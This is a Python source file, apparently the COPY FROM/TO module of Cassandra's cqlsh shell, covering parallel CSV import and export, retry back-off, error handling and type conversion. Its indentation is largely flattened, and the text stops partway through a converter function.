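def _example_classify_error(error_name):
    return 'parse' if ImportTaskError(error_name, 'example message').is_parse_error() else 'insert'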
class ImportErrorHandler(object):
"""
A class for managing import errors
"""
def __init__(self, task):
self.shell = task.shell
self.options = task.options
self.max_attempts = self.options.copy['maxattempts']
self.max_parse_errors = self.options.copy['maxparseerrors']
self.max_insert_errors = self.options.copy['maxinserterrors']
self.err_file = self.options.copy['errfile']
self.parse_errors = 0
self.insert_errors = 0
self.num_rows_failed = 0
if os.path.isfile(self.err_file):
now = datetime.datetime.now()
old_err_file = self.err_file + now.strftime('.%Y%m%d_%H%M%S')
printdebugmsg("Renaming existing %s to %s\n" % (self.err_file, old_err_file))
os.rename(self.err_file, old_err_file)
def max_exceeded(self):
if self.insert_errors > self.max_insert_errors >= 0:
self.shell.printerr("Exceeded maximum number of insert errors %d" % self.max_insert_errors)
return True
if self.parse_errors > self.max_parse_errors >= 0:
self.shell.printerr("Exceeded maximum number of parse errors %d" % self.max_parse_errors)
return True
return False
def add_failed_rows(self, rows):
self.num_rows_failed += len(rows)
with open(self.err_file, "a") as f:
writer = csv.writer(f, **self.options.dialect)
for row in rows:
writer.writerow(row)
def handle_error(self, err):
"""
Handle an error by printing the appropriate error message and incrementing the correct counter.
"""
shell = self.shell
if err.is_parse_error():
self.parse_errors += len(err.rows)
self.add_failed_rows(err.rows)
shell.printerr("Failed to import %d rows: %s - %s, given up without retries"
% (len(err.rows), err.name, err.msg))
else:
if not err.final:
shell.printerr("Failed to import %d rows: %s - %s, will retry later, attempt %d of %d"
% (len(err.rows), err.name, err.msg, err.attempts, self.max_attempts))
else:
self.insert_errors += len(err.rows)
self.add_failed_rows(err.rows)
shell.printerr("Failed to import %d rows: %s - %s, given up after %d attempts"
% (len(err.rows), err.name, err.msg, err.attempts))
class ImportTask(CopyTask):
"""
A class to import data from .csv by instantiating one or more processes
that work in parallel (ImportProcess).
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file):
CopyTask.__init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, 'from')
options = self.options
self.skip_columns = [c.strip() for c in self.options.copy['skipcols'].split(',')]
self.valid_columns = [c for c in self.columns if c not in self.skip_columns]
self.receive_meter = RateMeter(log_fcn=self.printmsg,
update_interval=options.copy['reportfrequency'],
log_file=options.copy['ratefile'])
self.error_handler = ImportErrorHandler(self)
self.feeding_result = None
self.sent = 0
def make_params(self):
ret = CopyTask.make_params(self)
ret['skip_columns'] = self.skip_columns
ret['valid_columns'] = self.valid_columns
return ret
def validate_columns(self):
if not CopyTask.validate_columns(self):
return False
shell = self.shell
if not self.valid_columns:
shell.printerr("No valid column specified")
return False
for c in self.table_meta.primary_key:
if c.name not in self.valid_columns:
shell.printerr("Primary key column '%s' missing or skipped" % (c.name,))
return False
return True
def run(self):
shell = self.shell
if self.options.unrecognized:
shell.printerr('Unrecognized COPY FROM options: %s' % ', '.join(list(self.options.unrecognized.keys())))
return
if not self.validate_columns():
return 0
columns = "[" + ", ".join(self.valid_columns) + "]"
self.printmsg("\nStarting copy of %s.%s with columns %s." % (self.ks, self.table, columns), encoding=self.encoding)
try:
params = self.make_params()
for i in range(self.num_processes - 1):
self.processes.append(ImportProcess(self.update_params(params, i)))
feeder = FeedingProcess(self.outmsg.pipes[-1], self.inmsg.pipes[-1],
self.outmsg.pipes[:-1], self.fname, self.options)
self.processes.append(feeder)
self.start_processes()
pr = profile_on() if PROFILE_ON else None
self.import_records()
if pr:
profile_off(pr, file_name='parent_profile_%d.txt' % (os.getpid(),))
except Exception as exc:
shell.printerr(str(exc))
if shell.debug:
traceback.print_exc()
return 0
finally:
self.close()
def send_stdin_rows(self):
"""
We need to pass stdin rows to the feeder process as it is not safe to pickle or share stdin
        directly (in the case of a file the child process would close it). This is very primitive support
        for STDIN import in that we won't start reporting progress until STDIN is fully consumed. I
        think this is reasonable.
"""
shell = self.shell
self.printmsg("[Use . on a line by itself to end input]")
for row in shell.use_stdin_reader(prompt='[copy] ', until=r'.'):
self.outmsg.channels[-1].send(row)
self.outmsg.channels[-1].send(None)
if shell.tty:
print()
def import_records(self):
"""
        Keep running as long as there is data to receive or send and all processes are still running.
        Send data (batches or retries) up to the maximum ingest rate. If we are waiting for data to
        be received, check the incoming queue.
"""
if not self.fname:
self.send_stdin_rows()
child_timeout = self.options.copy['childtimeout']
last_recv_num_records = 0
last_recv_time = time.time()
while self.feeding_result is None or self.receive_meter.total_records < self.feeding_result.sent:
self.receive_results()
if self.feeding_result is not None:
if self.receive_meter.total_records != last_recv_num_records:
last_recv_num_records = self.receive_meter.total_records
last_recv_time = time.time()
elif (time.time() - last_recv_time) > child_timeout:
self.shell.printerr("No records inserted in {} seconds, aborting".format(child_timeout))
break
if self.error_handler.max_exceeded() or not self.all_processes_running():
break
if self.error_handler.num_rows_failed:
self.shell.printerr("Failed to process %d rows; failed rows written to %s" %
(self.error_handler.num_rows_failed,
self.error_handler.err_file))
if not self.all_processes_running():
self.shell.printerr("{} child process(es) died unexpectedly, aborting"
.format(self.num_processes - self.num_live_processes()))
else:
if self.error_handler.max_exceeded():
self.processes[-1].terminate() # kill the feeder
for i, _ in enumerate(self.processes):
if self.processes[i].is_alive():
self.outmsg.channels[i].send(None)
# allow time for worker processes to exit cleanly
attempts = 50 # 100 milliseconds per attempt, so 5 seconds total
while attempts > 0 and self.num_live_processes() > 0:
time.sleep(0.1)
attempts -= 1
self.printmsg("\n%d rows imported from %d files in %s (%d skipped)." %
(self.receive_meter.get_total_records() - self.error_handler.num_rows_failed,
self.feeding_result.num_sources if self.feeding_result else 0,
self.describe_interval(time.time() - self.time_start),
self.feeding_result.skip_rows if self.feeding_result else 0))
def all_processes_running(self):
return self.num_live_processes() == len(self.processes)
def receive_results(self):
"""
Receive results from the worker processes, which will send the number of rows imported
or from the feeder process, which will send the number of rows sent when it has finished sending rows.
"""
aggregate_result = ImportProcessResult()
try:
for result in self.inmsg.recv(timeout=0.1):
if isinstance(result, ImportProcessResult):
aggregate_result.imported += result.imported
elif isinstance(result, ImportTaskError):
self.error_handler.handle_error(result)
elif isinstance(result, FeedingProcessResult):
self.feeding_result = result
else:
raise ValueError("Unexpected result: %s" % (result,))
finally:
self.receive_meter.increment(aggregate_result.imported)
class FeedingProcess(mp.Process):
"""
A process that reads from import sources and sends chunks to worker processes.
"""
def __init__(self, inpipe, outpipe, worker_pipes, fname, options):
super(FeedingProcess, self).__init__(target=self.run)
self.inpipe = inpipe
self.outpipe = outpipe
self.worker_pipes = worker_pipes
self.inmsg = None # might be initialised directly here? (see CASSANDRA-17350)
self.outmsg = None # might be initialised directly here? (see CASSANDRA-17350)
self.worker_channels = None # might be initialised directly here? (see CASSANDRA-17350)
self.reader = FilesReader(fname, options) if fname else PipeReader(inpipe, options)
self.send_meter = RateMeter(log_fcn=None, update_interval=1)
self.ingest_rate = options.copy['ingestrate']
self.num_worker_processes = options.copy['numprocesses']
self.max_pending_chunks = options.copy['maxpendingchunks']
self.chunk_id = 0
def on_fork(self):
"""
Create the channels and release any parent connections after forking,
see CASSANDRA-11749 for details.
"""
self.inmsg = ReceivingChannel(self.inpipe)
self.outmsg = SendingChannel(self.outpipe)
self.worker_channels = [SendingChannel(p) for p in self.worker_pipes]
def run(self):
pr = profile_on() if PROFILE_ON else None
self.inner_run()
if pr:
profile_off(pr, file_name='feeder_profile_%d.txt' % (os.getpid(),))
def inner_run(self):
"""
Send one batch per worker process to the queue unless we have exceeded the ingest rate.
        In the export case we queue everything and let the worker processes throttle using max_requests;
        here we throttle using the ingest rate in the feeding process because of memory usage concerns.
When finished we send back to the parent process the total number of rows sent.
"""
self.on_fork()
reader = self.reader
try:
reader.start()
except IOError as exc:
self.outmsg.send(ImportTaskError(exc.__class__.__name__, exc.message if hasattr(exc, 'message') else str(exc)))
channels = self.worker_channels
max_pending_chunks = self.max_pending_chunks
sent = 0
failed_attempts = 0
while not reader.exhausted:
channels_eligible = [c for c in channels if c.num_pending() < max_pending_chunks]
if not channels_eligible:
failed_attempts += 1
delay = randint(1, pow(2, failed_attempts))
printdebugmsg("All workers busy, sleeping for %d second(s)" % (delay,))
time.sleep(delay)
continue
elif failed_attempts > 0:
failed_attempts = 0
for ch in channels_eligible:
try:
max_rows = self.ingest_rate - self.send_meter.current_record
if max_rows <= 0:
self.send_meter.maybe_update(sleep=False)
continue
rows = reader.read_rows(max_rows)
if rows:
sent += self.send_chunk(ch, rows)
except Exception as exc:
self.outmsg.send(ImportTaskError(exc.__class__.__name__, exc.message if hasattr(exc, 'message') else str(exc)))
if reader.exhausted:
break
# send back to the parent process the number of rows sent to the worker processes
self.outmsg.send(FeedingProcessResult(sent, reader))
# wait for poison pill (None)
self.inmsg.recv()
def send_chunk(self, ch, rows):
self.chunk_id += 1
num_rows = len(rows)
self.send_meter.increment(num_rows)
ch.send({'id': self.chunk_id, 'rows': rows, 'imported': 0, 'num_rows_sent': num_rows})
return num_rows
def close(self):
self.reader.close()
self.inmsg.close()
self.outmsg.close()
for ch in self.worker_channels:
ch.close()
class ChildProcess(mp.Process):
"""
    A child worker process; this holds the functionality common to ImportProcess and ExportProcess.
"""
def __init__(self, params, target):
super(ChildProcess, self).__init__(target=target)
self.inpipe = params['inpipe']
self.outpipe = params['outpipe']
self.inmsg = None # might be initialised directly here? (see CASSANDRA-17350)
self.outmsg = None # might be initialised directly here? (see CASSANDRA-17350)
self.ks = params['ks']
self.table = params['table']
self.local_dc = params['local_dc']
self.columns = params['columns']
self.debug = params['debug']
self.port = params['port']
self.hostname = params['hostname']
self.connect_timeout = params['connect_timeout']
self.cql_version = params['cql_version']
self.auth_provider = params['auth_provider']
self.ssl = params['ssl']
self.protocol_version = params['protocol_version']
self.config_file = params['config_file']
options = params['options']
self.date_time_format = options.copy['dtformats']
self.consistency_level = options.copy['consistencylevel']
self.decimal_sep = options.copy['decimalsep']
self.thousands_sep = options.copy['thousandssep']
self.boolean_styles = options.copy['boolstyle']
self.max_attempts = options.copy['maxattempts']
self.encoding = options.copy['encoding']
# Here we inject some failures for testing purposes, only if this environment variable is set
if os.environ.get('CQLSH_COPY_TEST_FAILURES', ''):
self.test_failures = json.loads(os.environ.get('CQLSH_COPY_TEST_FAILURES', ''))
else:
self.test_failures = None
# attributes for coverage
self.coverage = params['coverage']
self.coveragerc_path = params['coveragerc_path']
self.coverage_collection = None
self.sigterm_handler = None
self.sighup_handler = None
def on_fork(self):
"""
Create the channels and release any parent connections after forking, see CASSANDRA-11749 for details.
"""
self.inmsg = ReceivingChannel(self.inpipe)
self.outmsg = SendingChannel(self.outpipe)
def close(self):
printdebugmsg("Closing queues...")
self.inmsg.close()
self.outmsg.close()
def start_coverage(self):
import coverage
self.coverage_collection = coverage.Coverage(config_file=self.coveragerc_path)
self.coverage_collection.start()
        # save the current handlers for SIGTERM and SIGHUP
        self.sigterm_handler = signal.getsignal(signal.SIGTERM)
        self.sighup_handler = signal.getsignal(signal.SIGHUP)
        def handle_sigterm(*args):  # signal handlers are invoked with (signum, frame)
self.stop_coverage()
self.close()
self.terminate()
# set custom handler for SIGHUP and SIGTERM
# needed to make sure coverage data is saved
signal.signal(signal.SIGTERM, handle_sigterm)
signal.signal(signal.SIGHUP, handle_sigterm)
def stop_coverage(self):
self.coverage_collection.stop()
self.coverage_collection.save()
signal.signal(signal.SIGTERM, self.sigterm_handler)
signal.signal(signal.SIGHUP, self.sighup_handler)
class ExpBackoffRetryPolicy(RetryPolicy):
"""
A retry policy with exponential back-off for read timeouts and write timeouts
"""
def __init__(self, parent_process):
RetryPolicy.__init__(self)
self.max_attempts = parent_process.max_attempts
def on_read_timeout(self, query, consistency, required_responses,
received_responses, data_retrieved, retry_num):
return self._handle_timeout(consistency, retry_num)
def on_write_timeout(self, query, consistency, write_type,
required_responses, received_responses, retry_num):
return self._handle_timeout(consistency, retry_num)
def _handle_timeout(self, consistency, retry_num):
delay = self.backoff(retry_num)
if delay > 0:
printdebugmsg("Timeout received, retrying after %d seconds" % (delay,))
time.sleep(delay)
return self.RETRY, consistency
elif delay == 0:
printdebugmsg("Timeout received, retrying immediately")
return self.RETRY, consistency
else:
printdebugmsg("Timeout received, giving up after %d attempts" % (retry_num + 1))
return self.RETHROW, None
def backoff(self, retry_num):
"""
Perform exponential back-off up to a maximum number of times, where
this maximum is per query.
To back-off we should wait a random number of seconds
between 0 and 2^c - 1, where c is the number of total failures.
:return : the number of seconds to wait for, -1 if we should not retry
"""
if retry_num >= self.max_attempts:
return -1
delay = randint(0, pow(2, retry_num + 1) - 1)
return delay
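# Illustrative sketch: ExpBackoffRetryPolicy waits a random number of seconds in [0, 2^(retry_num + 1) - 1]
# and gives up once retry_num reaches the maximum number of attempts. A minimal stand-alone version of the
# same formula, for reference only (max_attempts=5 is just an example value):
def _example_backoff_delay(retry_num, max_attempts=5):
    from random import randint
    if retry_num >= max_attempts:
        return -1  # caller should give up (RETHROW)
    return randint(0, pow(2, retry_num + 1) - 1)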
class ExportSession(object):
"""
A class for connecting to a cluster and storing the number
of requests that this connection is processing. It wraps the methods
for executing a query asynchronously and for shutting down the
connection to the cluster.
"""
def __init__(self, cluster, export_process):
session = cluster.connect(export_process.ks)
session.row_factory = tuple_factory
session.default_fetch_size = export_process.options.copy['pagesize']
session.default_timeout = export_process.options.copy['pagetimeout']
printdebugmsg("Created connection to %s with page size %d and timeout %d seconds per page"
% (cluster.contact_points, session.default_fetch_size, session.default_timeout))
self.cluster = cluster
self.session = session
self.requests = 1
self.lock = threading.Lock()
self.consistency_level = export_process.consistency_level
def add_request(self):
with self.lock:
self.requests += 1
def complete_request(self):
with self.lock:
self.requests -= 1
def num_requests(self):
with self.lock:
return self.requests
def execute_async(self, query):
return self.session.execute_async(SimpleStatement(query, consistency_level=self.consistency_level))
def shutdown(self):
self.cluster.shutdown()
class ExportProcess(ChildProcess):
"""
    A child worker process for the export task, ExportTask.
"""
def __init__(self, params):
ChildProcess.__init__(self, params=params, target=self.run)
options = params['options']
self.float_precision = options.copy['floatprecision']
self.double_precision = options.copy['doubleprecision']
self.nullval = options.copy['nullval']
self.max_requests = options.copy['maxrequests']
self.hosts_to_sessions = dict()
self.formatters = dict()
self.options = options
def run(self):
if self.coverage:
self.start_coverage()
try:
self.inner_run()
finally:
if self.coverage:
self.stop_coverage()
self.close()
def inner_run(self):
"""
The parent sends us (range, info) on the inbound queue (inmsg)
in order to request us to process a range, for which we can
select any of the hosts in info, which also contains other information for this
range such as the number of attempts already performed. We can signal errors
on the outbound queue (outmsg) by sending (range, error) or
we can signal a global error by sending (None, error).
We terminate when the inbound queue is closed.
"""
self.on_fork()
while True:
if self.num_requests() > self.max_requests:
time.sleep(0.001) # 1 millisecond
continue
token_range, info = self.inmsg.recv()
self.start_request(token_range, info)
@staticmethod
def get_error_message(err, print_traceback=False):
if isinstance(err, str):
msg = err
elif isinstance(err, BaseException):
msg = "%s - %s" % (err.__class__.__name__, err)
if print_traceback and sys.exc_info()[1] == err:
traceback.print_exc()
else:
msg = str(err)
return msg
def report_error(self, err, token_range):
msg = self.get_error_message(err, print_traceback=self.debug)
printdebugmsg(msg)
self.send((token_range, Exception(msg)))
def send(self, response):
self.outmsg.send(response)
def start_request(self, token_range, info):
"""
Begin querying a range by executing an async query that
will later on invoke the callbacks attached in attach_callbacks.
"""
session = self.get_session(info['hosts'], token_range)
if session:
metadata = session.cluster.metadata.keyspaces[self.ks].tables[self.table]
query = self.prepare_query(metadata.partition_key, token_range, info['attempts'])
future = session.execute_async(query)
self.attach_callbacks(token_range, future, session)
def num_requests(self):
return sum(session.num_requests() for session in list(self.hosts_to_sessions.values()))
def get_session(self, hosts, token_range):
"""
We return a session connected to one of the hosts passed in, which are valid replicas for
the token range. We sort replicas by favouring those without any active requests yet or with the
        smallest number of requests. If we fail to connect to all of them we report an error so that the token range
        will be retried later.
:return: An ExportSession connected to the chosen host.
"""
# sorted replicas favouring those with no connections yet
hosts = sorted(hosts,
key=lambda hh: 0 if hh not in self.hosts_to_sessions else self.hosts_to_sessions[hh].requests)
errors = []
ret = None
for host in hosts:
try:
ret = self.connect(host)
except Exception as e:
errors.append(self.get_error_message(e))
if ret:
if errors:
printdebugmsg("Warning: failed to connect to some replicas: %s" % (errors,))
return ret
self.report_error("Failed to connect to all replicas %s for %s, errors: %s" % (hosts, token_range, errors),
token_range)
return None
def connect(self, host):
if host in list(self.hosts_to_sessions.keys()):
session = self.hosts_to_sessions[host]
session.add_request()
return session
new_cluster = Cluster(
contact_points=(host,),
port=self.port,
cql_version=self.cql_version,
protocol_version=self.protocol_version,
auth_provider=self.auth_provider,
ssl_options=ssl_settings(host, self.config_file) if self.ssl else None,
load_balancing_policy=WhiteListRoundRobinPolicy([host]),
default_retry_policy=ExpBackoffRetryPolicy(self),
compression=None,
control_connection_timeout=self.connect_timeout,
connect_timeout=self.connect_timeout,
idle_heartbeat_interval=0)
session = ExportSession(new_cluster, self)
self.hosts_to_sessions[host] = session
return session
def attach_callbacks(self, token_range, future, session):
metadata = session.cluster.metadata
ks_meta = metadata.keyspaces[self.ks]
table_meta = ks_meta.tables[self.table]
cql_types = [CqlType(table_meta.columns[c].cql_type, ks_meta) for c in self.columns]
def result_callback(rows):
if future.has_more_pages:
future.start_fetching_next_page()
self.write_rows_to_csv(token_range, rows, cql_types)
else:
self.write_rows_to_csv(token_range, rows, cql_types)
self.send((None, None))
session.complete_request()
def err_callback(err):
self.report_error(err, token_range)
session.complete_request()
future.add_callbacks(callback=result_callback, errback=err_callback)
def write_rows_to_csv(self, token_range, rows, cql_types):
if not rows:
return # no rows in this range
try:
output = StringIO() if six.PY3 else BytesIO()
writer = csv.writer(output, **self.options.dialect)
for row in rows:
writer.writerow(list(map(self.format_value, row, cql_types)))
data = (output.getvalue(), len(rows))
self.send((token_range, data))
output.close()
except Exception as e:
self.report_error(e, token_range)
def format_value(self, val, cqltype):
if val is None or val == EMPTY:
return format_value_default(self.nullval, colormap=NO_COLOR_MAP)
formatter = self.formatters.get(cqltype, None)
if not formatter:
formatter = get_formatter(val, cqltype)
self.formatters[cqltype] = formatter
if not hasattr(cqltype, 'precision'):
cqltype.precision = self.double_precision if cqltype.type_name == 'double' else self.float_precision
formatted = formatter(val, cqltype=cqltype,
encoding=self.encoding, colormap=NO_COLOR_MAP, date_time_format=self.date_time_format,
float_precision=cqltype.precision, nullval=self.nullval, quote=False,
decimal_sep=self.decimal_sep, thousands_sep=self.thousands_sep,
boolean_styles=self.boolean_styles)
return formatted if six.PY3 else formatted.encode('utf8')
def close(self):
ChildProcess.close(self)
for session in list(self.hosts_to_sessions.values()):
session.shutdown()
def prepare_query(self, partition_key, token_range, attempts):
"""
Return the export query or a fake query with some failure injected.
"""
if self.test_failures:
return self.maybe_inject_failures(partition_key, token_range, attempts)
else:
return self.prepare_export_query(partition_key, token_range)
def maybe_inject_failures(self, partition_key, token_range, attempts):
"""
Examine self.test_failures and see if token_range is either a token range
supposed to cause a failure (failing_range) or to terminate the worker process
(exit_range). If not then call prepare_export_query(), which implements the
normal behavior.
"""
start_token, end_token = token_range
if not start_token or not end_token:
# exclude first and last ranges to make things simpler
return self.prepare_export_query(partition_key, token_range)
if 'failing_range' in self.test_failures:
failing_range = self.test_failures['failing_range']
if start_token >= failing_range['start'] and end_token <= failing_range['end']:
if attempts < failing_range['num_failures']:
return 'SELECT * from bad_table'
if 'exit_range' in self.test_failures:
exit_range = self.test_failures['exit_range']
if start_token >= exit_range['start'] and end_token <= exit_range['end']:
sys.exit(1)
return self.prepare_export_query(partition_key, token_range)
def prepare_export_query(self, partition_key, token_range):
"""
Return a query where we select all the data for this token range
"""
pk_cols = ", ".join(protect_names(col.name for col in partition_key))
columnlist = ', '.join(protect_names(self.columns))
start_token, end_token = token_range
query = 'SELECT %s FROM %s.%s' % (columnlist, protect_name(self.ks), protect_name(self.table))
if start_token is not None or end_token is not None:
query += ' WHERE'
if start_token is not None:
query += ' token(%s) > %s' % (pk_cols, start_token)
if start_token is not None and end_token is not None:
query += ' AND'
if end_token is not None:
query += ' token(%s) <= %s' % (pk_cols, end_token)
return query
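# For reference, prepare_export_query() produces statements of this shape for an interior token range
# (keyspace, table and column names below are purely illustrative):
#   SELECT col1, col2 FROM "ks"."tbl" WHERE token(pk) > -9223372036854775808 AND token(pk) <= 0
# The first and last ranges omit the lower or upper bound respectively.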
class ParseError(Exception):
""" We failed to parse an import record """
pass
class ImmutableDict(frozenset):
"""
Immutable dictionary implementation to represent map types.
    We need to pass BoundStatement.bind() a dict() because it calls iteritems(),
    but we can't create a dict with another dict as the key, so we use a class
    that adds iteritems to a frozenset of tuples (which is how dicts are normally made
    immutable in Python).
    Must be declared at the top level of the module to be available for pickling.
"""
iteritems = frozenset.__iter__
def items(self):
for k, v in self.iteritems():
yield k, v
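# Illustrative sketch: because ImmutableDict subclasses frozenset it is hashable, yet it still iterates
# like a dict, so a converted map value can itself be used as the key of another map.
def _example_immutable_dict_roundtrip():
    d = ImmutableDict([('k1', 1), ('k2', 2)])
    return dict(d.items()) == {'k1': 1, 'k2': 2} and {d: 'ok'}[d] == 'ok'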
class ImportConversion(object):
"""
A class for converting strings to values when importing from csv, used by ImportProcess,
the parent.
"""
def __init__(self, parent, table_meta, statement=None):
self.ks = parent.ks
self.table = parent.table
self.columns = parent.valid_columns
self.nullval = parent.nullval
self.decimal_sep = parent.decimal_sep
self.thousands_sep = parent.thousands_sep
self.boolean_styles = parent.boolean_styles
self.date_time_format = parent.date_time_format.timestamp_format
self.debug = parent.debug
self.encoding = parent.encoding
self.table_meta = table_meta
self.primary_key_indexes = [self.columns.index(col.name) for col in self.table_meta.primary_key]
self.partition_key_indexes = [self.columns.index(col.name) for col in self.table_meta.partition_key]
if statement is None:
self.use_prepared_statements = False
statement = self._get_primary_key_statement(parent, table_meta)
else:
self.use_prepared_statements = True
self.is_counter = parent.is_counter(table_meta)
self.proto_version = statement.protocol_version
# the cql types and converters for the prepared statement, either the full statement or only the primary keys
self.cqltypes = [c.type for c in statement.column_metadata]
self.converters = [self._get_converter(c.type) for c in statement.column_metadata]
# the cql types for the entire statement, these are the same as the types above but
# only when using prepared statements
self.coltypes = [table_meta.columns[name].cql_type for name in parent.valid_columns]
# these functions are used for non-prepared statements to protect values with quotes if required
self.protectors = [self._get_protector(t) for t in self.coltypes]
@staticmethod
def _get_protector(t):
if t in ('ascii', 'text', 'timestamp', 'date', 'time', 'inet'):
return lambda v: protect_value(v)
else:
return lambda v: v
@staticmethod
def _get_primary_key_statement(parent, table_meta):
"""
We prepare a query statement to find out the types of the partition key columns so we can
        route the update query to the correct replicas. As far as I understood, this is the easiest
        way to find out the types of the partition key columns; we will never actually execute this prepared statement.
"""
where_clause = ' AND '.join(['%s = ?' % (protect_name(c.name)) for c in table_meta.partition_key])
select_query = 'SELECT * FROM %s.%s WHERE %s' % (protect_name(parent.ks),
protect_name(parent.table),
where_clause)
return parent.session.prepare(ensure_str(select_query))
@staticmethod
def unprotect(v):
if v is not None:
return CqlRuleSet.dequote_value(v)
def _get_converter(self, cql_type):
"""
        Return a function that converts a string into a value that can be passed
into BoundStatement.bind() for the given cql type. See cassandra.cqltypes
for more details.
"""
unprotect = self.unprotect
def convert(t, v):
v = unprotect(v)
if v == self.nullval:
return self.get_null_val()
return converters.get(t.typename, convert_unknown)(v, ct=t)
def convert_mandatory(t, v):
v = unprotect(v)
# we can't distinguish between empty strings and null values in csv. Null values are not supported in
# collections, so it must be an empty string.
if v == self.nullval and not issubclass(t, VarcharType):
raise ParseError('Empty values are not allowed')
return converters.get(t.typename, convert_unknown)(v, ct=t)
def convert_blob(v, **_):
if sys.version_info.major >= 3:
return bytes.fromhex(v[2:])
else:
return BlobType(v[2:].decode("hex"))
def convert_text(v, **_):
return ensure_str(v)
def convert_uuid(v, **_):
return UUID(v)
def convert_bool(v, **_):
return True if v.lower() == ensure_str(self.boolean_styles[0]).lower() else False
def get_convert_integer_fcn(adapter=int):
"""
            Return a slow or a fast integer conversion function, depending on whether self.thousands_sep is set
"""
if self.thousands_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, ensure_str('')))
else:
return lambda v, ct=cql_type: adapter(v)
def get_convert_decimal_fcn(adapter=float):
"""
            Return a slow or a fast decimal conversion function, depending on self.thousands_sep and self.decimal_sep
"""
empty_str = ensure_str('')
dot_str = ensure_str('.')
if self.thousands_sep and self.decimal_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, empty_str).replace(self.decimal_sep, dot_str))
elif self.thousands_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, empty_str))
elif self.decimal_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.decimal_sep, dot_str))
else:
return lambda v, ct=cql_type: adapter(v)
def split(val, sep=','):
"""
Split "val" into a list of values whenever the separator "sep" is found, but
ignore separators inside parentheses or single quotes, except for the two
outermost parentheses, which will be ignored. This method is called when parsing composite
types, "val" should be at least 2 characters long, the first char should be an
open parenthesis and the last char should be a matching closing parenthesis. We could also
check exactly which parenthesis type depending on the caller, but I don't want to enforce
too many checks that don't necessarily provide any additional benefits, and risk breaking
data that could previously be imported, even if strictly speaking it is incorrect CQL.
For example, right now we accept sets that start with '[' and ']', I don't want to break this
by enforcing '{' and '}' in a minor release.
"""
def is_open_paren(cc):
return cc == '{' or cc == '[' or cc == '('
def is_close_paren(cc):
return cc == '}' or cc == ']' or cc == ')'
def paren_match(c1, c2):
return (c1 == '{' and c2 == '}') or (c1 == '[' and c2 == ']') or (c1 == '(' and c2 == ')')
if len(val) < 2 or not paren_match(val[0], val[-1]):
raise ParseError('Invalid composite string, it should start and end with matching parentheses: {}'
.format(val))
ret = []
last = 1
level = 0
quote = False
for i, c in enumerate(val):
if c == '\'':
quote = not quote
elif not quote:
if is_open_paren(c):
level += 1
elif is_close_paren(c):
level -= 1
elif c == sep and level == 1:
ret.append(val[last:i])
last = i + 1
else:
if last < len(val) - 1:
ret.append(val[last:-1])
return ret
# this should match all possible CQL and CQLSH datetime formats
p = re.compile(r"(\d{4})\-(\d{2})\-(\d{2})\s?(?:'T')?" # YYYY-MM-DD[( |'T')]
+ r"(?:(\d{2}):(\d{2})(?::(\d{2})(?:\.(\d{1,6}))?))?" # [HH:MM[:SS[.NNNNNN]]]
+ r"(?:([+\-])(\d{2}):?(\d{2}))?") # [(+|-)HH[:]MM]]
def convert_datetime(val, **_):
try:
if six.PY2:
# Python 2 implementation
tval = time.strptime(val, self.date_time_format)
return timegm(tval) * 1e3 # scale seconds to millis for the raw value
else:
# Python 3 implementation
dtval = datetime.datetime.strptime(val, self.date_time_format)
return dtval.timestamp() * 1000
except ValueError:
pass # if it's not in the default format we try CQL formats
m = p.match(val)
if not m:
try:
# in case of overflow COPY TO prints dates as milliseconds from the epoch, see
# deserialize_date_fallback_int in cqlsh.py
return int(val)
except ValueError:
raise ValueError("can't interpret %r as a date with format %s or as int" % (val,
self.date_time_format))
# https://docs.python.org/3/library/time.html#time.struct_time
tval = time.struct_time((int(m.group(1)), int(m.group(2)), int(m.group(3)), # year, month, day
int(m.group(4)) if m.group(4) else 0, # hour
int(m.group(5)) if m.group(5) else 0, # minute
int(m.group(6)) if m.group(6) else 0, # second
0, 1, -1)) # day of week, day of year, dst-flag
# convert sub-seconds (a number between 1 and 6 digits) to milliseconds
milliseconds = 0 if not m.group(7) else int(m.group(7)) * pow(10, 3 - len(m.group(7)))
if m.group(8):
offset = (int(m.group(9)) * 3600 + int(m.group(10)) * 60) * int(m.group(8) + '1')
else:
offset = -time.timezone
# scale seconds to millis for the raw value
return ((timegm(tval) + offset) * 1000) + milliseconds
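        # For reference, convert_datetime() first tries the configured DATETIMEFORMAT, then CQL-style
        # literals matched by the regex above, e.g. (values illustrative):
        #   '2018-05-20 13:30:54.234+0100'  ->  epoch milliseconds, honouring the +01:00 offset
        #   '2018-05-20'                    ->  midnight in the local time zone
        # and finally a plain integer, which is taken to be milliseconds since the epoch.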
def convert_date(v, **_):
return Date(v)
def convert_time(v, **_):
return Time(v)
def convert_tuple(val, ct=cql_type):
return tuple(convert_mandatory(t, v) for t, v in zip(ct.subtypes, split(val)))
def convert_list(val, ct=cql_type):
return tuple(convert_mandatory(ct.subtypes[0], v) for v in split(val))
def convert_set(val, ct=cql_type):
return frozenset(convert_mandatory(ct.subtypes[0], v) for v in split(val))
def convert_map(val, ct=cql_type):
"""
See ImmutableDict above for a discussion of why a special object is needed here.
"""
split_format_str = ensure_str('{%s}')
sep = ensure_str(':')
return ImmutableDict(frozenset((convert_mandatory(ct.subtypes[0], v[0]), convert(ct.subtypes[1], v[1]))
for v in [split(split_format_str % vv, sep=sep) for vv in split(val)]))
def convert_user_type(val, ct=cql_type):
"""
A user type is a dictionary except that we must convert each key into
an attribute, so we are using named tuples. It must also be hashable,
so we cannot use dictionaries. Maybe there is a way to instantiate ct
directly but I could not work it out.
Also note that it is possible that the subfield names in the csv are in the
wrong order, so we must sort them according to ct.fieldnames, see CASSANDRA-12959.
"""
split_format_str = ensure_str('{%s}')
sep = ensure_str(':')
vals = [v for v in [split(split_format_str % vv, sep=sep) for vv in split(val)]]
dict_vals = dict((unprotect(v[0]), v[1]) for v in vals)
sorted_converted_vals = [(n, convert(t, dict_vals[n]) if n in dict_vals else self.get_null_val())
for n, t in zip(ct.fieldnames, ct.subtypes)]
ret_type = namedtuple(ct.typename, [v[0] for v in sorted_converted_vals])
return ret_type(*tuple(v[1] for v in sorted_converted_vals))
def convert_single_subtype(val, ct=cql_type):
return converters.get(ct.subtypes[0].typename, convert_unknown)(val, ct=ct.subtypes[0])
def convert_unknown(val, ct=cql_type):
if issubclass(ct, UserType):
return convert_user_type(val, ct=ct)
elif issubclass(ct, ReversedType):
